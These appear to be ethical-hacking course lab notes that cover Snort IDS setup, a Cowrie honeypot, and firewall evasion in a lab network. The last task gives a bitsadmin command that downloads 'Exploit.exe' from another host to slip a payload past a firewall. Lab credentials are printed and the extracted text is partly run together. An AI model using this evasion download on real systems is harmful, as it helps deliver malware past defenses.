Module 12: Evading IDS, Firewalls , Honeypots
Ethical hackers or pen testers use numerous tools and techniques to evade the IDS and firewall on the target network. Recommended labs that will assist you in learning various evasion techniques include:
Perform intrusion detection using various tools
Detect intrusions using Snort
Deploy Cowrie honeypot to detect malicious network traffic
Evade ids/firewalls using various evasion techniques
Evade firewall through Windows BITSAdmin
Lab 1: Perform Intrusion Detection using Various Tools
Task 1: Detect Intrusions using Snort
1. Snort Installation:
Launch the Windows 11 machine and log in as
AdminusingPa$$w0rd.Navigate to the Snort installation directory (
E:\CEH-Tools\CEHv13 Module 12\Intrusion Detection Tools\Snort) and run the Snort installer (Snort_2_9_15_Installe.x64.exe).Accept the license agreement and follow the installation wizard to install Snort. The default install location is
C:\Snort.
2. Copy Configuration Files:
Copy the necessary configuration files (e.g.,
snort.conf,so_rules,preproc_rules, andrulesfolders) from the provided location (E:\CEH-Tools\...) toC:\Snort.Replace any existing files in the
C:\Snort\etcfolder with the new ones.
3. Initial Snort Setup:
Open a Command Prompt and navigate to
C:\Snort\bin.Run
snortto initialize Snort and then usesnort -Wto list your network interfaces.Identify the Ethernet Driver index (e.g.,
1), and enable it using the command:snort -dev -i 1.
4. Test Snort:
Leave the Snort window running and open another command prompt.
Run a ping command (
ping google.com) from the same machine to trigger a Snort alert.Verify that Snort detects the ping probe and generates an alert.
5. Configure snort.conf:
snort.conf:Open the
snort.conffile in Notepad++.Modify network variables in the
snort.conffile:Set
HOME_NETto the IP address of the Windows 11 machine (e.g.,10.10.1.11).Leave
EXTERNAL_NETasany.Set other server variables (e.g.,
DNS_SERVERS,SMTP_SERVERS, etc.) as needed.
Update
RULE_PATH,so_rules, andpreproc_rulesto the correct paths (e.g.,C:\Snort\rules).Configure dynamic preprocessor libraries with the correct paths.
Comment out unnecessary preprocessor rules.
Set output plugin paths for
classification.configandreference.config.Replace
ipvarwithvarto ensure proper configuration.
6. Enable Detection Rules:
Navigate to the
C:\Snort\rulesdirectory and enable ICMP rules by editingicmp-info.rules.Modify the rule to detect ICMP ping probes directed at the system (e.g.,
alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.1.11).
7. Run Snort in IDS Mode:
Run Snort using the command:
mathematicaCopy codesnort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K asciiReplace
Xwith the Ethernet interface index (e.g.,1).Snort starts in IDS mode, initializes, and waits for attacks.
8. Simulate an Attack:
Switch to the Windows Server 2019 (Attacker machine) and use the command:
Copy codeping 10.10.1.11 -t(Replace
10.10.1.11with the actual IP address of the Windows 11 machine).Snort on Windows 11 detects this ping and triggers an alert.
9. Check Snort Logs:
After Snort detects the attack, go to the Snort log directory (
C:\Snort\log\10.10.1.11) and open theICMP_ECHO.idsfile.The log file contains entries of detected attacks.
10. Completion:
The Snort IDS successfully detected and logged the attack (ping), indicating that the setup was successful.
Close all open windows on both machines.
Task 2: Deploy Cowrie Honeypot to Detect Malicious Network Traffic
1. Create Cowrie User and Prepare Environment:
Login to Ubuntu: Use
Ubuntu/toorcredentials.Create a new user
cowrie(with no password) by running:cssCopy codesudo adduser --disabled-password cowrieFollow the prompts and confirm.
2. Access Cowrie Files:
Navigate to CEH-Tools: Open
Fileson the Ubuntu machine and copy thecowriefolder from the network share (10.10.1.11/CEHv13 Module 12...) to/home/ubuntu.If
ceh-toolsis not visible, Connect to Server (smb://10.10.1.11), enter credentials (Admin/Pa$$w0rd), and navigate to thecowriefolder.
3. Install Dependencies:
Open a terminal and switch to root user:
Copy codesudo suNavigate to
cowriedirectory and install dependencies:bashCopy codecd cowrie pip install --upgrade -r requirements.txtChange to
/home/ubuntuand modify file permissions:bashCopy codechmod -R 777 cowrie
4. Set Up Port Redirection:
Redirect SSH traffic (port 22) to Cowrie's port 2222 using
iptables:cssCopy codeiptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
5. Configure Cowrie to Run on Port 22:
Use
authbindto allow thecowrieuser to bind to port 22:bashCopy codetouch /etc/authbind/byport/22 chown cowrie:cowrie /etc/authbind/byport/22 chmod 770 /etc/authbind/byport/22
6. Create Virtual Environment:
Create and activate a Python virtual environment:
bashCopy codevirtualenv --python=python3 cowrie-env source cowrie-env/local/bin/activate
7. Start Cowrie Honeypot:
Navigate to the
cowriedirectory and start the honeypot:bashCopy codebin/cowrie start
8. View Cowrie Logs:
Open the log file to check for incoming SSH connections:
bashCopy codecd /var/log/cowrie/ tail cowrie.logEnsure that the log shows: "Ready to accept SSH connections."
9. Simulate Attacks from Parrot Security:
Switch to Parrot Security machine and run
nmapto scan for open ports on the target:cssCopy codenmap -p- -sV 10.10.1.9You should see port 22 open, indicating the honeypot is running on this port.
Attempt SSH Brute-Force: Use PuTTY to attempt SSH login (use
ubuntu/tooror random credentials). The connection will be redirected to the Cowrie honeypot.
10. Observe Attack in Cowrie Logs:
Switch back to Ubuntu machine and run:
bashCopy codetail cowrie.logThe log will capture the attacker’s SSH connection attempts and interactions.
Lab 2: Evade IDS/Firewalls using Various Evasion Techniques
Task 1: Evade Firewall through Windows BITSAdmin
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exeLast updated